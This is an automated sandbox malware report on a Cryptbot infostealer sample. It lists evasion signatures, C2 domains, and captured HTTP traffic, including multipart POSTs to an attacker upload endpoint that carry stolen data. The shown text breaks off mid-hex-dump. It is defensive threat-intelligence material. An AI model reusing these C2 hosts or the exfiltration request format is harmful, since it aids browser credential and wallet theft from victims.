Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560842
MD5: c878e548b34090d3363394f1575de391
SHA1: e50b216ffbf5520d72740bc28e8cfd626cfc301f
SHA256: 52911f8f5c5f6be9a30bd49dda17f109c1eb90db57c58bc502cb31d0285c9d77
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.504.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "QUERY|rd|AAAA|IN|fvtekk5pn.top", "|fvtekk5pn.top", "0/80/home.fvtekk5pn.top", "domainadmin.dnspod.com5pn.top", "QUERY|rd|AAAA|IN|home.fvtekk5pn.top", "home.fvtekk5pn.top", "\"home.fvtekk5pn.top", "5pn.top", "QUERY|rd|A|IN|fvtekk5pn.top", "QUERY|rd|A|IN|home.fvtekk5pn.top", "fvtekk5pn.top"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 12_2_00DA15B0
Source: file.exe, 00000000.00000003.2202299923.0000000007172000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_f7f3fac3-0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 12_2_00DA81E0
Source: chrome.exe Memory has grown: Private usage: 5MB later: 28MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49837 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49844 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49876 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: QUERY|rd|AAAA|IN|fvtekk5pn.top
Source: Malware configuration extractor URLs: |fvtekk5pn.top
Source: Malware configuration extractor URLs: 0/80/home.fvtekk5pn.top
Source: Malware configuration extractor URLs: domainadmin.dnspod.com5pn.top
Source: Malware configuration extractor URLs: QUERY|rd|AAAA|IN|home.fvtekk5pn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: Malware configuration extractor URLs: "home.fvtekk5pn.top
Source: Malware configuration extractor URLs: 5pn.top
Source: Malware configuration extractor URLs: QUERY|rd|A|IN|fvtekk5pn.top
Source: Malware configuration extractor URLs: QUERY|rd|A|IN|home.fvtekk5pn.top
Source: Malware configuration extractor URLs: fvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------256Re7rOrNUsm7bHVruG34Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 36 52 65 37 72 4f 72 4e 55 73 6d 37 62 48 56 72 75 47 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 75 73 6f 79 69 6e 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d7 4a 2b 9b 8d 15 f5 f3 e9 9a 08 84 85 7c a2 6d 19 c5 8c 34 68 91 b9 b0 68 86 f7 6b 68 48 b2 fe 08 5b 52 6d b0 b6 1a 45 8c 73 d1 e6 8b 00 10 e3 f8 a3 9d 2c b2 cf 0b b5 c4 33 e9 17 74 09 87 44 61 d0 be ca 17 54 ad 71 e7 b2 21 45 d0 98 58 d6 3d cc be b6 13 74 de 56 94 bf 85 3c b6 4c e0 2e 20 62 61 6c 46 ba 35 02 6f 1a 0b 72 bc ac 09 2f be 2f 85 24 67 32 24 c5 fc a9 66 8d 43 98 d3 1e 2f ee fe 40 d4 68 85 74 4b e1 fb ff bb a4 9c 35 77 2c e9 c9 ad 6a e8 30 b3 f5 98 51 3a 47 8c 31 5d b4 26 02 52 4c ae a6 4c 67 d7 9e 1e 04 82 b7 50 55 3b f4 e8 a8 7e 63 8a 8d 85 f7 2c 03 a0 d1 fc b2 88 4d 10 c3 99 0b 36 80 07 3b 34 e2 96 7d b7 ec 7d 7d d3 f0 de cc 3a d4 c0 62 ea 0a b3 0d cf 2b 8d ab ff 5e 59 ab 8d 46 83 9b 4c f0 54 e9 c7 04 13 fb ca 82 4f cb 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 36 52 65 37 72 4f 72 4e 55 73 6d 37 62 48 56 72 75 47 33 34 2d 2d 0d 0a Data Ascii: --------------------------256Re7rOrNUsm7bHVruG34Content-Disposition: form-data; name="file"; filename="Susoyino.bin"Content-Type: application/octet-streamJ+|m4hhkhH[RmEs,3tDaTq!EX=tV<L. balF5or//$g2$fC/@htK5w,j0Q:G1]&RLLgPU;~c,M6;4}}}:b+^YFLTO--------------------------256Re7rOrNUsm7bHVruG34--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 76585Content-Type: multipart/form-data; boundary=------------------------uH4jdber48n1FkexYmYYxRData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 75 48 34 6a 64 62 65 72 34 38 6e 31 46 6b 65 78 59 6d 59 59 78 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 44 69 70 61 64 6f 76 69 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 9b e7 cf 59 3d 8d 6b e4 bc 0d fa cf db 21 68 49 94 32 18 2b ec 67 cb f4 59 eb 02 2d c8 74 63 3b 33 bc 5c 68 8d ec 24 f8 46 49 62 18 39 49 82 98 74 2e dd c2 d7 08 01 77 af 15 4d 53 9c 9c 88 fb d2 03 27 3c ef d7 13 05 0d 19 a0 c5 f4 80 63 95 ec 0d 9a a8 f9 c4 cf 97 a9 a2 13 84 a0 e8 41 16 50 a0 2b 36 0f fe ac ab 1b 52 5b ff e7 8c ab fa a5 ba e9 7e 5f 18 ec fa 10 f5 07 f6 39 65 f9 33 9e 89 bb 4d ca 27 f0 65 9e 07 37 94 ab 38 e7 1c a6 22 45 c4 46 c9 a3 52 c0 95 49 be af 39 bd a0 8e 1d 6e f8 80 ed 4b cc d9 7b 8a 40 23 eb 91 67 27 63 29 dd d0 5b f1 3e ba b8 de 8d 9e bc 50 88 cc 92 4e 05 72 76 ad bd b3 0a 2c ae 3e e6 b9 e0 7b 3d 72 d8 03 be 83 12 26 eb e0 94 d6 58 b6 8e 9a 9e 24 31 87 a8 9d 72 b5 b0 af b8 52 8f 4c d6 0b 4b e7 27 22 6b 20 c8 28 78 54 37 ba 64 f6 23 b3 7d 4e 77 46 6a 05 16 56 60 70 d3 1a e1 e0 e7 04 2e 46 30 51 95 a3 86 4a dd 14 c5 08 76 70 22 f0 c0 ed 06 68 4c 21 ef fe 42 7d 37 6d ea 2e 5d 18 22 cd 26 a0 de 6e 5f 01 fc 11 a1 00 c1 b8 9b 50 fe dc eb 9a 29 fd b4 2d 7c a8 cf 4b 9d 5f 23 c4 98 34 3f 20 6f 60 75 0d 34 24 01 65 d2 2e cb fe aa d0 69 b6 77 80 d4 fc 68 ad f4 97 bd df e0 05 b2 90 ca 1a c9 44 24 c3 3a e6 f0 02 ab 31 9f c8 46 a2 6a e1 2a fc e6 9f b1 44 b4 21 04 be e9 b9 03 e2 cc 15 2c 61 5c 4d f3 0e d7 9b 55 df 0c fd 2b de 8c 64 10 ac aa 35 87 c9 d4 26 6a 68 73 e2 e9 96 13 b0 0c 46 57 a8 01 b8 9b 0b c6 23 33 ff 0f e8 10 c1 c8 48 75 6f 3d cd 3d 22 e0 a3 7e 53 3c 42 bf 79 45 aa 6c 34 cf 25 af a7 32 4a ad 79 1a 4d 1c a3 5c e1 b7 66 a4 56 a8 50 49 02 6c 4d 9a a1 4c 06 69 f4 fa 72 23 da 05 40 3f 4d 0e ac 8b b9 01 e4 47 6b fa 2b 40 97 68 06 a6 73 8c 76 70 e2 c0 3b 29 d6 fc f5 27 76 0f e8 af 28 d0 3f 31 f5 7c a3 f7 23 de dc 69 51 12 e3 b0 ab e3 0a ee bc 54 cb 34 de b2 a1 d9 81 65 62 c3 40 8c 21 64 0d b6 5c a9 3a 13 7d 69 e8 46 9f 2c df a8 e2 f5 96 39 d6 b6 4a 64 f5 d9 54 22 0a c5 91 8d 5e 53 eb 02 34 7a 3f 83 97 40 4b 0a 25 a2 af 61 10 16 14 c2 35 81 87 05 ae 23 3f af 51 96 c6 7c 79 ce a7 41 36 63 03 56 87 82 39 6c 60 67 85 e2 ce 0e 47 b6 15 b6 2c c7 44 2b 5a 24 69 50 36 a3 b7 67 87 28 03 9e 43 09 18 77 db 7e 96 8f d7 56 29 68 c6 73 2b a3 46 6d 9f b9 31 36 98 d3 3b bf a6 2b c6 4d 5b b5 31 0a 7b 72 27 3e 3c b1 04 d3 5a 52 5f e4 49 b2 a2 e4 06 33 da 1c 03 c7 2f 58 b8 ff 82 5f 2e 45 45 d3 e3 9d b9 26 3a 53 e1 83 08 83 ed 6e e2 19 68 69 ff 2d b3 a8 2f 59 b9 83 18 5e a5 61 0f 6d
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 30407Content-Type: multipart/form-data; boundary=------------------------xFxeHwlFR0ZenibJR0DUxSData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 78 46 78 65 48 77 6c 46 52 30 5a 65 6e 69 62 4a 52 30 44 55 78 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 64 75 62 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f9 d4 48 a7 07 60 a0 1c 5a 84 3a 89 c8 ef 32 a6 73 93 8d af 4f 9f 9d 39 59 46 5b e6 d3 57 f5 15 73 97 31 2d 70 1c 5a 84 8d fe 50 23 2f 40 44 07 51 49 19 68 bc 1a 2f 90 d0 0e 23 db d3 df ee 22 04 2f ca eb a2 27 77 13 e6 42 44 f7 5c 8a d9 91 72 e3 c8 bb 31 85 2b 65 00 62 bf 06 89 22 5e 14 98 43 62 c9 3a df b4 ab 70 36 a2 fb 89 55 4b 71 6c 92 4a 5d f4 34 7d 2c 57 11 7a d1 3a a4 4f 8c 82 ea 43 29 a4 3f b4 ba 3a fe 3c 4a 09 9a af 15 7e 34 17 12 db 70 83 97 12 43 b2 1c 42 bb 7e 93 62 ac 40 15 81 4c 32 ae 1d 59 28 cf 6c cc 6e 88 5a ca f6 3a f4 75 6a c4 52 90 f8 fd f2 a7 dd ed 1e 6f b8 ef f1 8d 90 54 98 b1 69 99 e5 46 d8 98 e3 16 f2 d4 62 17 07 a8 43 26 31 72 fb 52 16 66 a6 9e 75 a9 07 9b 43 2a 8f 6b b8 9e ba f5 1f c7 e6 b9 5f 21 b1 ac 8e 87 15 40 8a 6c 57 60 1a ae 40 61 b6 9f 25 e1 af b9 61 14 88 e2 ea 75 1e 61 83 d8 6a fe 5a f7 1b a9 1b 82 8b 9d bd 79 c7 79 d8 1a 2a b8 a6 24 75 5c bc 85 d7 d2 2a 0a 4e c8 9c 8b 85 c4 c8 1e d0 94 4e 0c 08 3e 8c f2 9e b2 9b 78 aa 8d 08 89 be c4 1f 56 7d c2 a9 22 48 c6 fa 72 77 1a 29 c6 d7 59 89 da 05 41 59 b0 e1 0d 3e a6 66 8a 97 5d 20 1f ce 36 c6 73 18 70 46 82 f2 5f ad 0f ea fd 4f 3d 25 61 dc 57 e8 05 21 21 1a 6c ce 19 40 f0 60 a4 cb 0b 12 52 41 5d 73 86 23 d4 db 1b 51 5e ae 21 e4 a2 ea 00 7e d1 3d 56 7d 96 09 d7 38 1a d9 28 8a 47 35 95 cc 2b e8 77 52 a0 5c d0 cf e6 f9 f1 59 31 75 fa 73 9c a2 53 44 90 63 87 9f c3 e4 77 1b d9 58 e9 7f 4a 63 b3 27 51 05 ff a4 b0 f0 39 b0 49 7b 63 df 61 dc bc c8 3a 7c 1b fe db f0 b9 f6 d1 88 fc 6f d8 2d 1c 00 48 94 11 f8 50 72 6b 82 33 3b 53 b9 20 41 3e 0e 79 6d 09 70 b8 75 4e 88 db a6 24 8b 60 77 ea 14 b3 5c 3b 1d dc 74 60 77 61 46 72 7b 6e c8 ed e4 be 49 ee 00 3a 07 c3 61 11 af 04 b2 62 f3 9b 4f a6 48 95 f3 63 3a 71 4f 7f 84 1f 1e 45 36 02 0e c3 0e d4 ba 80 41 53 10 95 b7 c7 7f 80 df 5f b9 1a 7b ee 7f 81 36 3e 92 cd 34 c2 df ae a1 b5 11 e7 3f e5 0e 02 f1 13 f7 37 e1 c5 bd 96 48 d5 cb 85 71 df 63 f2 9e 45 98 4f 63 0c de f3 ae 84 d0 e3 f1 39 e0 05 85 62 4f ad 11 81 d0 5e 59 6f 4a 51 68 cf 81 89 c7 5f 62 8e 4d 02 41 5a 10 8b 68 0e 59 23 02 d4 02 a7 81 c9 16 92 30 0d 67 5f 78 4e 9c 65 38 86 56 b0 52 2d c4 72 19 f3 1c cf 6d d3 85 bd 59 87 2c f5 a5 6e 70 ec bb ae e7 0e dc 44 2f c2 d3 f9 b6 d6 53 37 32 4a a3 cc f6 8a 5e 6d df 4a 60 48 c9 a1 85 d3 94 95 69 cc 16 a9 6d 89 e0 d9 b3 6f 24 8a da 0e 90 dd c7 23 75 6e 51 67 00 54 8b 79 21 6a
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2727975449.00002BF000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728188712.00002BF000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728128839.00002BF00100C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000A.00000003.2727975449.00002BF000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728188712.00002BF000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728128839.00002BF00100C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.2757279934.00002BF0002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------256Re7rOrNUsm7bHVruG34Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 36 52 65 37 72 4f 72 4e 55 73 6d 37 62 48 56 72 75 47 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 75 73 6f 79 69 6e 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d7 4a 2b 9b 8d 15 f5 f3 e9 9a 08 84 85 7c a2 6d 19 c5 8c 34 68 91 b9 b0 68 86 f7 6b 68 48 b2 fe 08 5b 52 6d b0 b6 1a 45 8c 73 d1 e6 8b 00 10 e3 f8 a3 9d 2c b2 cf 0b b5 c4 33 e9 17 74 09 87 44 61 d0 be ca 17 54 ad 71 e7 b2 21 45 d0 98 58 d6 3d cc be b6 13 74 de 56 94 bf 85 3c b6 4c e0 2e 20 62 61 6c 46 ba 35 02 6f 1a 0b 72 bc ac 09 2f be 2f 85 24 67 32 24 c5 fc a9 66 8d 43 98 d3 1e 2f ee fe 40 d4 68 85 74 4b e1 fb 